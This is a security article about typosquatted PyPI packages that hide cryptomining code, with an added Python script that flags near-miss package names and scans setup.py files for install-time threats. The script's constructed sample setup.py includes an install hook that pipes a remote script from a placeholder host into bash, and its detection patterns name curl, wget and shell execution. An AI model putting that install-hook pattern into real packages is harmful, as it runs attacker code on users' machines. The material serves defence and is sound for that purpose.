Beware of Malicious PyPI Packages: How Typos Turn Into Crypto‑Mining Malware
A simple typo when using pip can install a malicious PyPI package that hides cryptomining code, and security researchers have uncovered dozens of such deceptive packages, highlighting the supply‑chain risks of Python's package ecosystem and offering practical mitigation steps.
Malicious PyPI Packages
Installing Python software via PyPI is convenient, but a simple typo can pull a malicious package. For example, running pip install openvc installs the malicious openvc package instead of the intended opencv.
Security firm Sonatype reports that many malicious packages masquerade as popular PyPI libraries, differing by only a few characters, and often embed cryptomining code.
Mining Software Disguised as Popular Libraries
The popular plotting library matplotlib has several look‑alike malicious packages, such as mplatlib, maratlib, and others uploaded by the user nedog123. In total, seven impostor packages have been identified.
These packages depend on each other; for instance, learninglib depends on maratlib. Some hide dependencies, e.g., mplatlib disguises its dependency as “LKEK”.
Deep Obfuscation and Cryptomining Payloads
Analysis of maratlib 1.0 shows heavy obfuscation, making it hard to see the hidden code. Version 0.6 reveals that it downloads and executes a Bash script from GitHub, which in turn fetches the cryptominer “Ubqminer” and includes the attacker’s wallet address.
PyPI has removed these packages, but they have already been downloaded more than 5,000 times.
Why PyPI Supply‑Chain Risks Matter
These incidents are only the tip of the iceberg. Earlier attacks in 2016 used similar naming tricks, affecting 1,700 developers and running 45,000 times, even compromising U.S. military systems.
To mitigate the risk, monitor what setup.py does at install time, install suspicious packages only inside isolated containers, and capture their system calls and network traffic. The same caution applies to other package managers such as npm and gem.
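As an added example (not code from the article, Sonatype, or any of the cited sources), the script below shows two pre-install checks a team can run before a package ever reaches a container: a near-miss check of requested names against an allowlist of the packages the team actually uses, which catches transposition and omission squats like openvc for opencv, and a static scan of a setup.py for the install-time download-and-execute pattern the maratlib analysis describes, which is the signal needed for looser look-alikes such as maratlib that no edit-distance threshold will flag. The allowlist (using the names as the article gives them), the requested-package list, and the setup.py text are all constructed for the demo; the regex labels are descriptive names chosen here.

```python
"""Pre-install checks against typosquatted PyPI packages (added example)."""
import re
from typing import Dict, List, Tuple

# Constructed allowlist. In practice this is the curated set of projects a
# team depends on (or a top-N-downloads list), not a hard-coded handful.
KNOWN_PACKAGES = ["opencv", "matplotlib", "numpy", "requests", "scipy", "pandas"]


def normalize(name: str) -> str:
    """PEP 503 name normalisation: case-fold and collapse [-_.] runs to '-'."""
    return re.sub(r"[-_.]+", "-", name).lower()


def edit_distance(a: str, b: str) -> int:
    """Optimal string alignment distance: insert, delete and substitute cost 1,
    and an adjacent transposition ('openvc' -> 'opencv') also costs 1."""
    m, n = len(a), len(b)
    d = [[0] * (n + 1) for _ in range(m + 1)]
    for i in range(m + 1):
        d[i][0] = i
    for j in range(n + 1):
        d[0][j] = j
    for i in range(1, m + 1):
        for j in range(1, n + 1):
            cost = 0 if a[i - 1] == b[j - 1] else 1
            d[i][j] = min(d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + cost)
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)
    return d[m][n]


def find_typosquats(requested: List[str], known: List[str] = KNOWN_PACKAGES,
                    max_distance: int = 2) -> Dict[str, str]:
    """Map every requested name that is a near-miss of a known package (but not
    an exact match) to the package it was probably meant to be."""
    known_norm = {normalize(k): k for k in known}
    hits: Dict[str, str] = {}
    for name in requested:
        n = normalize(name)
        if n in known_norm:
            continue  # exact match, nothing to flag
        best = min(known_norm, key=lambda k: edit_distance(n, k))
        if edit_distance(n, best) <= max_distance:
            hits[name] = known_norm[best]
    return hits


# Install-time behaviour signals; labels are descriptive names chosen here.
SETUP_PY_SIGNALS: List[Tuple[str, "re.Pattern[str]"]] = [
    ("network fetch", re.compile(r"urlopen\(|urlretrieve\(|requests\.(get|post)\(|\b(curl|wget)\b")),
    ("shell execution", re.compile(r"subprocess\.|os\.system\(|os\.popen\(")),
    ("dynamic code", re.compile(r"\b(exec|eval)\(|base64\.b64decode\(")),
    ("install hook", re.compile(r"cmdclass\s*=|class\s+\w+\((install|develop|egg_info)\)")),
]


def scan_setup_py(source: str) -> List[Tuple[int, str, str]]:
    """Return (line_number, signal, stripped_line) for each line matching a signal."""
    findings = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        for label, pattern in SETUP_PY_SIGNALS:
            if pattern.search(line):
                findings.append((lineno, label, line.strip()))
    return findings


# Constructed setup.py in the shape the article describes: an install hook
# that fetches and runs a remote script. The URL is a placeholder.
SAMPLE_SETUP_PY = """\
from setuptools import setup
from setuptools.command.install import install
import subprocess

class PostInstall(install):
    def run(self):
        install.run(self)
        # constructed stand-in for the download-and-execute step
        subprocess.call("curl -s https://example.invalid/run.sh | bash", shell=True)

setup(name="maratlib", version="0.6", cmdclass={"install": PostInstall})
"""

if __name__ == "__main__":
    # Constructed requirements: one real name, one transposition, one omission.
    for bad, meant in find_typosquats(["numpy", "openvc", "matplotlb"]).items():
        print(f"{bad!r} looks like a typo of {meant!r}; review before installing")
    for lineno, label, text in scan_setup_py(SAMPLE_SETUP_PY):
        print(f"setup.py:{lineno}: {label}: {text}")
```

Both checks are advisory: a near-miss can be a legitimate project, and a setup.py that shells out may be a build step, so the output is a review queue for the isolated-container run the article recommends, not an automatic block. The scan is line-based and will miss signals split across lines or hidden behind the obfuscation seen in maratlib 1.0, which is exactly why the dynamic capture of system calls and network traffic remains the stronger control.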
References: Sonatype blog, Ars Technica, Freebuf, GitHub repository.
